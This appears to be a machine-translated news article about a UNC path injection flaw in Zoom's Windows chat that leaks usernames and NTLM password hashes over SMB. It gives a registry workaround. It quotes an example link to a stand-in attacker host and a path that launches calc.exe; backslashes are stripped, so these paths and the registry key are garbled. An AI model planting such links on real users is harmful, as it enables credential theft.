The sudden and growing popularity of Zoom is bringing to light some of the weak points of the service, especially appreciated by those who in this period of emergency coronavirus is forced to adopt the formula of smart working. Of the issues related to privacy and encryption we have already written an article a few hours ago: in this we consider a vulnerability that affects the chat.

Zoom: vulnerability UNC Path Injection

The solution allows you to interact through video calls, and also through messages that are similar to those of Skype or Teams. The link sent to the other participants to the discussion are automatically converted to hyperlinks so that one-click access to an online resource external. A researcher, however, has discovered that the same happens with the addresses UNC (Universal Naming Convention) used by Microsoft operating systems, as Windows, for example “\host-nameshare-name[object-name]”.

Zoom: UNC Path Injection per rubare la password di Windows

The demonstration in the screenshot above, published by the editorial staff of BleepingComputer: is the link to the homepage of the website is the address to UNC (“\evil.server.comimagescat.jpg”) they are treated the same way. The click by the user causes the operating system to connect to the indicated resource via SMB protocol (Server Message Block) to access the file in question, passing from the transmission of the username and thehash of the password, an attacker can then decrypt using tools that are easy to find.

The same technique of the UNC Path Injection can be used to push a member of the chat room to launch a program installed in the computer (“\$windowssystem32calc.exe” for the calculator). In this case, however, Windows should prevent the immediate execution of the software by showing a message on the screen and asking for permission.

How to fix it?

Waiting for the team to work on the Zoom action to eliminate the problem upstream, simply disabling the automatic conversion of addresses in the UNC, users can get secure by using a workaround. It is to be done if in this period you use the Zoom on the Windows for smart working, or for other communications. It is necessary to switch from editing a key in the registry (regedit). In “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaMSV1_0” it is necessary to create the new value “RestrictSendingNTLMTraffic” and set it to “2”.

La voce del registro di sistema da modificare

Following the modification does not need any restart. To return to the previous setting you need to do is delete the value.